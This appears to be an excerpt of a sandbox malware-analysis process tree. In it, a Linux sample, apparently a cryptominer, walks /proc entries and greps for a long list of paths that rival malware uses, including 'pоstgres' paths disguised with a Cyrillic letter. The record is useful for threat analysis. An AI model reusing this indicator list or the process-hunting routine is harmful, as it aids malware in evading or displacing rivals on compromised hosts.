/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1226
-
-
/bin/grepgrep exe2⤵PID:1230
-
-
/bin/lsls -latrh /proc/irq2⤵PID:1229
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1232
-
-
/bin/grepgrep exe2⤵PID:1236
-
-
/bin/lsls -latrh /proc/kallsyms2⤵PID:1235
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1239
-
-
/bin/grepgrep exe2⤵PID:1242
-
-
/bin/lsls -latrh /proc/kcore2⤵PID:1241
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1246
-
-
/bin/grepgrep exe2⤵PID:1249
-
-
/bin/lsls -latrh /proc/keys2⤵PID:1248
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1252
-
-
/bin/grepgrep exe2⤵PID:1256
-
-
/bin/lsls -latrh /proc/key-users2⤵PID:1255
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1258
-
-
/bin/grepgrep exe2⤵PID:1262
-
-
/bin/lsls -latrh /proc/kmsg2⤵PID:1261
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1265
-
-
/bin/grepgrep exe2⤵PID:1269
-
-
/bin/lsls -latrh /proc/kpagecgroup2⤵PID:1268
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1272
-
-
/bin/lsls -latrh /proc/kpagecount2⤵PID:1274
-
-
/bin/grepgrep exe2⤵PID:1275
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1278
-
-
/bin/grepgrep exe2⤵PID:1282
-
-
/bin/lsls -latrh /proc/kpageflags2⤵PID:1281
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1284
-
-
/bin/grepgrep exe2⤵PID:1288
-
-
/bin/lsls -latrh /proc/loadavg2⤵PID:1287
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1291
-
-
/bin/grepgrep exe2⤵PID:1294
-
-
/bin/lsls -latrh /proc/locks2⤵PID:1293
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1298
-
-
/bin/grepgrep exe2⤵PID:1301
-
-
/bin/lsls -latrh /proc/meminfo2⤵PID:1300
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1303
-
-
/bin/grepgrep exe2⤵PID:1308
-
-
/bin/lsls -latrh /proc/misc2⤵PID:1306
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1313
-
-
/bin/grepgrep exe2⤵PID:1316
-
-
/bin/lsls -latrh /proc/modules2⤵PID:1315
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1319
-
-
/bin/grepgrep exe2⤵PID:1323
-
-
/bin/lsls -latrh /proc/mounts2⤵PID:1322
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1325
-
-
/bin/grepgrep exe2⤵PID:1328
-
-
/bin/lsls -latrh /proc/net2⤵PID:1327
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1330
-
-
/bin/grepgrep exe2⤵PID:1333
-
-
/bin/lsls -latrh /proc/pagetypeinfo2⤵PID:1332
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1335
-
-
/bin/grepgrep exe2⤵PID:1338
-
-
/bin/lsls -latrh /proc/partitions2⤵PID:1337
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1340
-
-
/bin/grepgrep exe2⤵PID:1343
-
-
/bin/lsls -latrh /proc/sched_debug2⤵PID:1342
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1345
-
-
/bin/grepgrep exe2⤵PID:1348
-
-
/bin/lsls -latrh /proc/schedstat2⤵PID:1347
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1350
-
-
/bin/grepgrep exe2⤵PID:1353
-
-
/bin/lsls -latrh /proc/self2⤵PID:1352
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1355
-
-
/bin/grepgrep exe2⤵PID:1358
-
-
/bin/lsls -latrh /proc/slabinfo2⤵PID:1357
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1360
-
-
/bin/grepgrep exe2⤵PID:1363
-
-
/bin/lsls -latrh /proc/softirqs2⤵PID:1362
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1365
-
-
/bin/grepgrep exe2⤵PID:1368
-
-
/bin/lsls -latrh /proc/stat2⤵PID:1367
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1370
-
-
/bin/grepgrep exe2⤵PID:1373
-
-
/bin/lsls -latrh /proc/swaps2⤵PID:1372
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1375
-
-
/bin/grepgrep exe2⤵PID:1378
-
-
/bin/lsls -latrh /proc/sys2⤵PID:1377
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1380
-
-
/bin/grepgrep exe2⤵PID:1383
-
-
/bin/lsls -latrh /proc/sysrq-trigger2⤵PID:1382
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1385
-
-
/bin/grepgrep exe2⤵PID:1388
-
-
/bin/lsls -latrh /proc/sysvipc2⤵
- System Network Configuration Discovery
PID:1387
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1390
-
-
/bin/grepgrep exe2⤵PID:1393
-
-
/bin/lsls -latrh /proc/thread-self2⤵PID:1392
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1395
-
-
/bin/grepgrep exe2⤵PID:1398
-
-
/bin/lsls -latrh /proc/timer_list2⤵PID:1397
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1400
-
-
/bin/grepgrep exe2⤵PID:1403
-
-
/bin/lsls -latrh /proc/tty2⤵PID:1402
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1405
-
-
/bin/grepgrep exe2⤵PID:1408
-
-
/bin/lsls -latrh /proc/uptime2⤵PID:1407
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1410
-
-
/bin/grepgrep exe2⤵PID:1413
-
-
/bin/lsls -latrh /proc/version2⤵PID:1412
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1415
-
-
/bin/grepgrep exe2⤵PID:1418
-
-
/bin/lsls -latrh /proc/vmallocinfo2⤵PID:1417
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1420
-
-
/bin/grepgrep exe2⤵PID:1423
-
-
/bin/lsls -latrh /proc/vmstat2⤵PID:1422
-
-
